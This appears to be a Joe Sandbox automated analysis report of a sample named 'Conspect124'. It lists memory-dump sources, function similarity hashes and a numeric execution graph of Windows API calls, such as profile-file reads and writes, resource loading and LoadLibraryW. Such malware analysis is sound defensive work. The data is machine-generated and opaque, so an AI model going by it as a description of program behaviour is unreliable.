                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                      • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                      • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                      • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                      Function 00406BF5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                      • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                      • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                      • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                      Function 00406D13 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                      • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                      • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                      • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                      Function 00406C5F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                      • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                      • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                      • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                      Function 00405CA3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CCB
                                      • CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                      • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                      • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                      • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8

                                      Execution Graph

                                      Execution Coverage:6%
                                      Dynamic/Decrypted Code Coverage:9.2%
                                      Signature Coverage:3.5%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:64
                                      execution_graph 37499 44dea5 37500 44deb5 FreeLibrary 37499->37500 37501 44dec3 37499->37501 37500->37501 40081 4147f3 40084 414561 40081->40084 40083 414813 40085 41456d 40084->40085 40086 41457f GetPrivateProfileIntW 40084->40086 40089 4143f1 memset _itow WritePrivateProfileStringW 40085->40089 40086->40083 40088 41457a 40088->40083 40089->40088 37502 4287c1 37503 4287d2 37502->37503 37504 429ac1 37502->37504 37506 428818 37503->37506 37507 42881f 37503->37507 37522 425711 37503->37522 37516 425ad6 37504->37516 37572 415c56 11 API calls 37504->37572 37539 42013a 37506->37539 37567 420244 97 API calls 37507->37567 37510 4260dd 37566 424251 120 API calls 37510->37566 37514 4259da 37565 416760 11 API calls 37514->37565 37519 429a4d 37520 429a66 37519->37520 37521 429a9b 37519->37521 37568 415c56 11 API calls 37520->37568 37534 429a96 37521->37534 37570 416760 11 API calls 37521->37570 37522->37504 37522->37514 37522->37519 37523 422aeb memset memcpy memcpy 37522->37523 37526 4260a1 37522->37526 37535 4259c2 37522->37535 37538 425a38 37522->37538 37555 4227f0 memset memcpy 37522->37555 37556 422b84 15 API calls 37522->37556 37557 422b5d memset memcpy memcpy 37522->37557 37558 422640 13 API calls 37522->37558 37560 4241fc 11 API calls 37522->37560 37561 42413a 90 API calls 37522->37561 37523->37522 37564 415c56 11 API calls 37526->37564 37529 429a7a 37569 416760 11 API calls 37529->37569 37571 424251 120 API calls 37534->37571 37535->37516 37559 415c56 11 API calls 37535->37559 37538->37535 37562 422640 13 API calls 37538->37562 37563 4226e0 12 API calls 37538->37563 37540 42014c 37539->37540 37543 420151 37539->37543 37582 41e466 97 API calls 37540->37582 37542 420162 37542->37522 37543->37542 37544 4201b3 37543->37544 37545 420229 37543->37545 37546 4201b8 37544->37546 37547 4201dc 37544->37547 37545->37542 37548 41fd5e 86 API calls 37545->37548 37573 41fbdb 37546->37573 37547->37542 37551 4201ff 37547->37551 37579 41fc4c 37547->37579 37548->37542 37551->37542 37554 42013a 97 API calls 37551->37554 37554->37542 37555->37522 37556->37522 37557->37522 37558->37522 37559->37514 37560->37522 37561->37522 37562->37538 37563->37538 37564->37514 37565->37510 37566->37516 37567->37522 37568->37529 37569->37534 37570->37534 37571->37504 37572->37514 37574 41fbf1 37573->37574 37575 41fbf8 37573->37575 37578 41fc39 37574->37578 37597 4446ce 11 API calls 37574->37597 37587 41ee26 37575->37587 37578->37542 37583 41fd5e 37578->37583 37580 41ee6b 86 API calls 37579->37580 37581 41fc5d 37580->37581 37581->37547 37582->37543 37585 41fd65 37583->37585 37584 41fdab 37584->37542 37585->37584 37586 41fbdb 86 API calls 37585->37586 37586->37585 37588 41ee41 37587->37588 37589 41ee32 37587->37589 37598 41edad 37588->37598 37601 4446ce 11 API calls 37589->37601 37592 41ee3c 37592->37574 37595 41ee58 37595->37592 37603 41ee6b 37595->37603 37597->37578 37607 41be52 37598->37607 37601->37592 37602 41eb85 11 API calls 37602->37595 37604 41ee70 37603->37604 37605 41ee78 37603->37605 37660 41bf99 86 API calls 37604->37660 37605->37592 37608 41be6f 37607->37608 37609 41be5f 37607->37609 37612 41be8c 37608->37612 37639 418c63 memset memset 37608->37639 37638 4446ce 11 API calls 37609->37638 37614 41be69 37612->37614 37615 41bf3a 37612->37615 37616 41bed1 37612->37616 37624 41bee7 37612->37624 37614->37592 37614->37602 37642 4446ce 11 API calls 37615->37642 37618 41bef0 37616->37618 37620 41bee2 37616->37620 37619 41bf01 37618->37619 37618->37624 37621 41bf24 memset 37619->37621 37623 41bf14 37619->37623 37640 418a6d memset memcpy memset 37619->37640 37628 41ac13 37620->37628 37621->37614 37641 41a223 memset memcpy memset 37623->37641 37624->37614 37643 41a453 86 API calls 37624->37643 37627 41bf20 37627->37621 37629 41ac52 37628->37629 37630 41ac3f memset 37628->37630 37632 41ac6a 37629->37632 37644 41dc14 19 API calls 37629->37644 37637 41acd9 37630->37637 37634 41aca1 37632->37634 37645 41519d 37632->37645 37635 41acc0 memset 37634->37635 37636 41accd memcpy 37634->37636 37634->37637 37635->37637 37636->37637 37637->37624 37638->37614 37639->37612 37640->37623 37641->37627 37642->37624 37644->37632 37648 4175ed 37645->37648 37656 417570 SetFilePointer 37648->37656 37651 41760a ReadFile 37652 417637 37651->37652 37653 417627 GetLastError 37651->37653 37654 4151b3 37652->37654 37655 41763e memset 37652->37655 37653->37654 37654->37634 37655->37654 37657 41759c GetLastError 37656->37657 37659 4175b2 37656->37659 37658 4175a8 GetLastError 37657->37658 37657->37659 37658->37659 37659->37651 37659->37654 37660->37605 37661 417bc5 37662 417c61 37661->37662 37667 417bda 37661->37667 37663 417bf6 UnmapViewOfFile CloseHandle 37663->37663 37663->37667 37665 417c2c 37665->37667 37673 41851e 20 API calls 37665->37673 37667->37662 37667->37663 37667->37665 37668 4175b7 37667->37668 37669 4175d6 CloseHandle 37668->37669 37670 4175c8 37669->37670 37671 4175df 37669->37671 37670->37671 37672 4175ce Sleep 37670->37672 37671->37667 37672->37669 37673->37665 37674 4152c7 malloc 37675 4152ef 37674->37675 37677 4152e2 37674->37677 37678 416760 11 API calls 37675->37678 37678->37677 40090 4148b6 FindResourceW 40091 4148f9 40090->40091 40092 4148cf SizeofResource 40090->40092 40092->40091 40093 4148e0 LoadResource 40092->40093 40093->40091 40094 4148ee LockResource 40093->40094 40094->40091 37679 415308 free 40095 441b3f 40105 43a9f6 40095->40105 40097 441b61 40278 4386af memset 40097->40278 40099 44189a 40100 442bd4 40099->40100 40101 4418e2 40099->40101 40102 4418ea 40100->40102 40280 441409 memset 40100->40280 40101->40102 40279 4414a9 12 API calls 40101->40279 40106 43aa20 40105->40106 40107 43aadf 40105->40107 40106->40107 40108 43aa34 memset 40106->40108 40107->40097 40109 43aa56 40108->40109 40110 43aa4d 40108->40110 40281 43a6e7 40109->40281 40289 42c02e memset 40110->40289 40115 43aad3 40291 4169a7 11 API calls 40115->40291 40116 43aaae 40116->40107 40116->40115 40131 43aae5 40116->40131 40118 43ac18 40120 43ac47 40118->40120 40293 42bbd5 memcpy memcpy memcpy memset memcpy 40118->40293 40121 43aca8 40120->40121 40294 438eed 16 API calls 40120->40294 40125 43acd5 40121->40125 40296 4233ae 11 API calls 40121->40296 40124 43ac87 40295 4233c5 16 API calls 40124->40295 40297 423426 11 API calls 40125->40297 40129 43ace1 40298 439811 163 API calls 40129->40298 40130 43a9f6 161 API calls 40130->40131 40131->40107 40131->40118 40131->40130 40292 439bbb 22 API calls 40131->40292 40133 43acfd 40139 43ad2c 40133->40139 40299 438eed 16 API calls 40133->40299 40135 43ad19 40300 4233c5 16 API calls 40135->40300 40136 43ad58 40301 44081d 163 API calls 40136->40301 40139->40136 40141 43add9 40139->40141 40141->40141 40305 423426 11 API calls 40141->40305 40142 43ae3a memset 40143 43ae73 40142->40143 40306 42e1c0 147 API calls 40143->40306 40144 43adab 40303 438c4e 163 API calls 40144->40303 40146 43ad6c 40146->40107 40146->40144 40302 42370b memset memcpy memset 40146->40302 40148 43ae96 40307 42e1c0 147 API calls 40148->40307 40150 43adcc 40304 440f84 12 API calls 40150->40304 40153 43aea8 40154 43aec1 40153->40154 40308 42e199 147 API calls 40153->40308 40156 43af00 40154->40156 40309 42e1c0 147 API calls 40154->40309 40156->40107 40159 43af1a 40156->40159 40160 43b3d9 40156->40160 40310 438eed 16 API calls 40159->40310 40165 43b3f6 40160->40165 40172 43b4c8 40160->40172 40162 43b60f 40162->40107 40369 4393a5 17 API calls 40162->40369 40163 43af2f 40311 4233c5 16 API calls 40163->40311 40351 432878 12 API calls 40165->40351 40167 43af51 40312 423426 11 API calls 40167->40312 40170 43af7d 40313 423426 11 API calls 40170->40313 40171 43b4f2 40358 43a76c 21 API calls 40171->40358 40172->40171 40357 42bbd5 memcpy memcpy memcpy memset memcpy 40172->40357 40176 43b529 40359 44081d 163 API calls 40176->40359 40177 43af94 40314 423330 11 API calls 40177->40314 40181 43b47e 40185 43b497 40181->40185 40354 42374a memcpy memset memcpy memcpy memcpy 40181->40354 40182 43b544 40186 43b55c 40182->40186 40360 42c02e memset 40182->40360 40183 43b428 40204 43b462 40183->40204 40352 432b60 16 API calls 40183->40352 40184 43afca 40315 423330 11 API calls 40184->40315 40355 4233ae 11 API calls 40185->40355 40361 43a87a 163 API calls 40186->40361 40191 43afdb 40316 4233ae 11 API calls 40191->40316 40193 43b4b1 40356 423399 11 API calls 40193->40356 40195 43b56c 40205 43b58a 40195->40205 40362 423330 11 API calls 40195->40362 40197 43afee 40317 44081d 163 API calls 40197->40317 40199 43b4c1 40365 42db80 163 API calls 40199->40365 40203 43b592 40364 43a82f 16 API calls 40203->40364 40353 423330 11 API calls 40204->40353 40363 440f84 12 API calls 40205->40363 40208 43b5b4 40366 438c4e 163 API calls 40208->40366 40210 43b5cf 40367 42c02e memset 40210->40367 40212 43b005 40212->40107 40215 43b01f 40212->40215 40318 42d836 163 API calls 40212->40318 40213 43b1ef 40328 4233c5 16 API calls 40213->40328 40215->40213 40326 423330 11 API calls 40215->40326 40327 42d71d 163 API calls 40215->40327 40216 43b212 40329 423330 11 API calls 40216->40329 40219 43add4 40219->40162 40368 438f86 16 API calls 40219->40368 40222 43b087 40319 4233ae 11 API calls 40222->40319 40223 43b22a 40330 42ccb5 11 API calls 40223->40330 40226 43b10f 40322 423330 11 API calls 40226->40322 40227 43b23f 40331 4233ae 11 API calls 40227->40331 40229 43b257 40332 4233ae 11 API calls 40229->40332 40233 43b26e 40333 4233ae 11 API calls 40233->40333 40234 43b129 40323 4233ae 11 API calls 40234->40323 40237 43b09a 40237->40226 40320 42cc15 19 API calls 40237->40320 40321 4233ae 11 API calls 40237->40321 40238 43b282 40334 43a87a 163 API calls 40238->40334 40240 43b13c 40324 440f84 12 API calls 40240->40324 40242 43b29d 40335 423330 11 API calls 40242->40335 40245 43b15f 40325 4233ae 11 API calls 40245->40325 40246 43b2af 40248 43b2b8 40246->40248 40249 43b2ce 40246->40249 40336 4233ae 11 API calls 40248->40336 40337 440f84 12 API calls 40249->40337 40252 43b2c9 40339 4233ae 11 API calls 40252->40339 40253 43b2da 40338 42370b memset memcpy memset 40253->40338 40256 43b2f9 40340 423330 11 API calls 40256->40340 40258 43b30b 40341 423330 11 API calls 40258->40341 40260 43b325 40342 423399 11 API calls 40260->40342 40262 43b332 40343 4233ae 11 API calls 40262->40343 40264 43b354 40344 423399 11 API calls 40264->40344 40266 43b364 40345 43a82f 16 API calls 40266->40345 40268 43b370 40346 42db80 163 API calls 40268->40346 40270 43b380 40347 438c4e 163 API calls 40270->40347 40272 43b39e 40348 423399 11 API calls 40272->40348 40274 43b3ae 40349 43a76c 21 API calls 40274->40349 40276 43b3c3 40350 423399 11 API calls 40276->40350 40278->40099 40279->40102 40280->40100 40282 43a6f5 40281->40282 40283 43a765 40281->40283 40282->40283 40370 42a115 40282->40370 40283->40107 40290 4397fd memset 40283->40290 40287 43a73d 40287->40283 40288 42a115 147 API calls 40287->40288 40288->40283 40289->40109 40290->40116 40291->40107 40292->40131 40293->40120 40294->40124 40295->40121 40296->40125 40297->40129 40298->40133 40299->40135 40300->40139 40301->40146 40302->40144 40303->40150 40304->40219 40305->40142 40306->40148 40307->40153 40308->40154 40309->40154 40310->40163 40311->40167 40312->40170 40313->40177 40314->40184 40315->40191 40316->40197 40317->40212 40318->40222 40319->40237 40320->40237 40321->40237 40322->40234 40323->40240 40324->40245 40325->40215 40326->40215 40327->40215 40328->40216 40329->40223 40330->40227 40331->40229 40332->40233 40333->40238 40334->40242 40335->40246 40336->40252 40337->40253 40338->40252 40339->40256 40340->40258 40341->40260 40342->40262 40343->40264 40344->40266 40345->40268 40346->40270 40347->40272 40348->40274 40349->40276 40350->40219 40351->40183 40352->40204 40353->40181 40354->40185 40355->40193 40356->40199 40357->40171 40358->40176 40359->40182 40360->40186 40361->40195 40362->40205 40363->40203 40364->40199 40365->40208 40366->40210 40367->40219 40368->40162 40369->40107 40371 42a175 40370->40371 40373 42a122 40370->40373 40371->40283 40376 42b13b 147 API calls 40371->40376 40373->40371 40374 42a115 147 API calls 40373->40374 40377 43a174 40373->40377 40401 42a0a8 147 API calls 40373->40401 40374->40373 40376->40287 40391 43a196 40377->40391 40392 43a19e 40377->40392 40378 43a306 40378->40391 40414 4388c4 14 API calls 40378->40414 40381 42a115 147 API calls 40381->40392 40382 415a91 memset 40382->40392 40383 43a642 40383->40391 40418 4169a7 11 API calls 40383->40418 40385 4165ff 11 API calls 40385->40392 40387 43a635 40417 42c02e memset 40387->40417 40391->40373 40392->40378 40392->40381 40392->40382 40392->40385 40392->40391 40402 42ff8c 40392->40402 40410 439504 13 API calls 40392->40410 40411 4312d0 147 API calls 40392->40411 40412 42be4c memcpy memcpy memcpy memset memcpy 40392->40412 40413 43a121 11 API calls 40392->40413 40394 4169a7 11 API calls 40395 43a325 40394->40395 40395->40383 40395->40387 40395->40391 40395->40394 40396 42b5b5 memset memcpy 40395->40396 40397 42bf4c 14 API calls 40395->40397 40400 4165ff 11 API calls 40395->40400 40415 42b63e 14 API calls 40395->40415 40416 42bfcf memcpy 40395->40416 40396->40395 40397->40395 40400->40395 40401->40373 40403 43817e 139 API calls 40402->40403 40404 42ff99 40403->40404 40405 42ffe3 40404->40405 40406 42ffd0 40404->40406 40409 42ff9d 40404->40409 40420 4169a7 11 API calls 40405->40420 40419 4169a7 11 API calls 40406->40419 40409->40392 40410->40392 40411->40392 40412->40392 40413->40392 40414->40395 40415->40395 40416->40395 40417->40383 40418->40391 40419->40409 40420->40409 37680 41276d 37681 41277d 37680->37681 37723 4044a4 LoadLibraryW 37681->37723 37683 412785 37715 412789 37683->37715 37731 414b81 37683->37731 37686 4127c8 37737 412465 memset ??2@YAPAXI 37686->37737 37688 4127ea 37749 40ac21 37688->37749 37693 412813 37767 40dd07 memset 37693->37767 37694 412827 37772 40db69 memset 37694->37772 37697 412822 37793 4125b6 ??3@YAXPAX 37697->37793 37699 40ada2 _wcsicmp 37700 41283d 37699->37700 37700->37697 37703 412863 CoInitialize 37700->37703 37777 41268e 37700->37777 37797 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37703->37797 37707 41296f 37799 40b633 37707->37799 37709 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37714 412957 CoUninitialize 37709->37714 37720 4128ca 37709->37720 37714->37697 37716 4128d0 TranslateAcceleratorW 37717 412941 GetMessageW 37716->37717 37716->37720 37717->37714 37717->37716 37718 412909 IsDialogMessageW 37718->37717 37718->37720 37719 4128fd IsDialogMessageW 37719->37717 37719->37718 37720->37716 37720->37718 37720->37719 37721 41292b TranslateMessage DispatchMessageW 37720->37721 37722 41291f IsDialogMessageW 37720->37722 37721->37717 37722->37717 37722->37721 37724 4044cf GetProcAddress 37723->37724 37728 4044f7 37723->37728 37725 4044e8 FreeLibrary 37724->37725 37726 4044df 37724->37726 37727 4044f3 37725->37727 37725->37728 37726->37725 37727->37728 37729 404507 MessageBoxW 37728->37729 37730 40451e 37728->37730 37729->37683 37730->37683 37732 414b8a 37731->37732 37733 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37731->37733 37803 40a804 memset 37732->37803 37733->37686 37736 414b9e GetProcAddress 37736->37733 37738 4124e0 37737->37738 37739 412505 ??2@YAPAXI 37738->37739 37740 41251c 37739->37740 37742 412521 37739->37742 37825 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37740->37825 37814 444722 37742->37814 37748 41259b wcscpy 37748->37688 37830 40b1ab free free 37749->37830 37751 40ad76 37831 40aa04 37751->37831 37754 40a9ce malloc memcpy free free 37757 40ac5c 37754->37757 37755 40ad4b 37755->37751 37854 40a9ce 37755->37854 37757->37751 37757->37754 37757->37755 37758 40ace7 free 37757->37758 37834 40a8d0 37757->37834 37846 4099f4 37757->37846 37758->37757 37762 40a8d0 7 API calls 37762->37751 37763 40ada2 37764 40adc9 37763->37764 37765 40adaa 37763->37765 37764->37693 37764->37694 37765->37764 37766 40adb3 _wcsicmp 37765->37766 37766->37764 37766->37765 37859 40dce0 37767->37859 37769 40dd3a GetModuleHandleW 37864 40dba7 37769->37864 37773 40dce0 3 API calls 37772->37773 37774 40db99 37773->37774 37936 40dae1 37774->37936 37950 402f3a 37777->37950 37779 412766 37779->37697 37779->37703 37780 4126d3 _wcsicmp 37781 4126a8 37780->37781 37781->37779 37781->37780 37783 41270a 37781->37783 37984 4125f8 7 API calls 37781->37984 37783->37779 37953 411ac5 37783->37953 37794 4125da 37793->37794 37795 4125f0 37794->37795 37796 4125e6 DeleteObject 37794->37796 37798 40b1ab free free 37795->37798 37796->37795 37797->37709 37798->37707 37800 40b640 37799->37800 37801 40b639 free 37799->37801 37802 40b1ab free free 37800->37802 37801->37800 37802->37715 37804 40a83b GetSystemDirectoryW 37803->37804 37805 40a84c wcscpy 37803->37805 37804->37805 37810 409719 wcslen 37805->37810 37808 40a881 LoadLibraryW 37809 40a886 37808->37809 37809->37733 37809->37736 37811 409724 37810->37811 37812 409739 wcscat LoadLibraryW 37810->37812 37811->37812 37813 40972c wcscat 37811->37813 37812->37808 37812->37809 37813->37812 37815 444732 37814->37815 37816 444728 DeleteObject 37814->37816 37826 409cc3 37815->37826 37816->37815 37818 412551 37819 4010f9 37818->37819 37820 401130 37819->37820 37821 401134 GetModuleHandleW LoadIconW 37820->37821 37822 401107 wcsncat 37820->37822 37823 40a7be 37821->37823 37822->37820 37824 40a7d2 37823->37824 37824->37748 37824->37824 37825->37742 37829 409bfd memset wcscpy 37826->37829 37828 409cdb CreateFontIndirectW 37828->37818 37829->37828 37830->37757 37832 40aa14 37831->37832 37833 40aa0a free 37831->37833 37832->37763 37833->37832 37835 40a8eb 37834->37835 37836 40a8df wcslen 37834->37836 37837 40a906 free 37835->37837 37838 40a90f 37835->37838 37836->37835 37839 40a919 37837->37839 37840 4099f4 3 API calls 37838->37840 37841 40a932 37839->37841 37842 40a929 free 37839->37842 37840->37839 37844 4099f4 3 API calls 37841->37844 37843 40a93e memcpy 37842->37843 37843->37757 37845 40a93d 37844->37845 37845->37843 37847 409a41 37846->37847 37848 4099fb malloc 37846->37848 37847->37757 37850 409a37 37848->37850 37851 409a1c 37848->37851 37850->37757 37852 409a30 free 37851->37852 37853 409a20 memcpy 37851->37853 37852->37850 37853->37852 37855 40a9e7 37854->37855 37856 40a9dc free 37854->37856 37858 4099f4 3 API calls 37855->37858 37857 40a9f2 37856->37857 37857->37762 37858->37857 37883 409bca GetModuleFileNameW 37859->37883 37861 40dce6 wcsrchr 37862 40dcf5 37861->37862 37863 40dcf9 wcscat 37861->37863 37862->37863 37863->37769 37884 44db70 37864->37884 37868 40dbfd 37887 4447d9 37868->37887 37871 40dc34 wcscpy wcscpy 37913 40d6f5 37871->37913 37872 40dc1f wcscpy 37872->37871 37875 40d6f5 3 API calls 37876 40dc73 37875->37876 37877 40d6f5 3 API calls 37876->37877 37878 40dc89 37877->37878 37879 40d6f5 3 API calls 37878->37879 37880 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37879->37880 37919 40da80 37880->37919 37883->37861 37885 40dbb4 memset memset 37884->37885 37886 409bca GetModuleFileNameW 37885->37886 37886->37868 37889 4447f4 37887->37889 37888 40dc1b 37888->37871 37888->37872 37889->37888 37890 444807 ??2@YAPAXI 37889->37890 37891 44481f 37890->37891 37892 444873 _snwprintf 37891->37892 37893 4448ab wcscpy 37891->37893 37926 44474a 8 API calls 37892->37926 37895 4448bb 37893->37895 37927 44474a 8 API calls 37895->37927 37896 4448a7 37896->37893 37896->37895 37898 4448cd 37928 44474a 8 API calls 37898->37928 37900 4448e2 37929 44474a 8 API calls 37900->37929 37902 4448f7 37930 44474a 8 API calls 37902->37930 37904 44490c 37931 44474a 8 API calls 37904->37931 37906 444921 37932 44474a 8 API calls 37906->37932 37908 444936 37933 44474a 8 API calls 37908->37933 37910 44494b 37934 44474a 8 API calls 37910->37934 37912 444960 ??3@YAXPAX 37912->37888 37914 44db70 37913->37914 37915 40d702 memset GetPrivateProfileStringW 37914->37915 37916 40d752 37915->37916 37917 40d75c WritePrivateProfileStringW 37915->37917 37916->37917 37918 40d758 37916->37918 37917->37918 37918->37875 37920 44db70 37919->37920 37921 40da8d memset 37920->37921 37922 40daac LoadStringW 37921->37922 37923 40dac6 37922->37923 37923->37922 37925 40dade 37923->37925 37935 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37923->37935 37925->37697 37926->37896 37927->37898 37928->37900 37929->37902 37930->37904 37931->37906 37932->37908 37933->37910 37934->37912 37935->37923 37946 409b98 GetFileAttributesW 37936->37946 37938 40daea 37939 40db63 37938->37939 37940 40daef wcscpy wcscpy GetPrivateProfileIntW 37938->37940 37939->37699 37947 40d65d GetPrivateProfileStringW 37940->37947 37942 40db3e 37948 40d65d GetPrivateProfileStringW 37942->37948 37944 40db4f 37949 40d65d GetPrivateProfileStringW 37944->37949 37946->37938 37947->37942 37948->37944 37949->37939 37985 40eaff 37950->37985 37954 411ae2 memset 37953->37954 37955 411b8f 37953->37955 38025 409bca GetModuleFileNameW 37954->38025 37967 411a8b 37955->37967 37957 411b0a wcsrchr 37958 411b22 wcscat 37957->37958 37959 411b1f 37957->37959 38026 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37958->38026 37959->37958 37961 411b67 38027 402afb 37961->38027 37965 411b7f 38083 40ea13 SendMessageW memset SendMessageW 37965->38083 37968 402afb 27 API calls 37967->37968 37969 411ac0 37968->37969 37970 4110dc 37969->37970 37971 41113e 37970->37971 37976 4110f0 37970->37976 38108 40969c LoadCursorW SetCursor 37971->38108 37973 411143 38109 4032b4 37973->38109 38127 444a54 37973->38127 37974 4110f7 _wcsicmp 37974->37976 37975 411157 37977 40ada2 _wcsicmp 37975->37977 37976->37971 37976->37974 38130 410c46 10 API calls 37976->38130 37980 411167 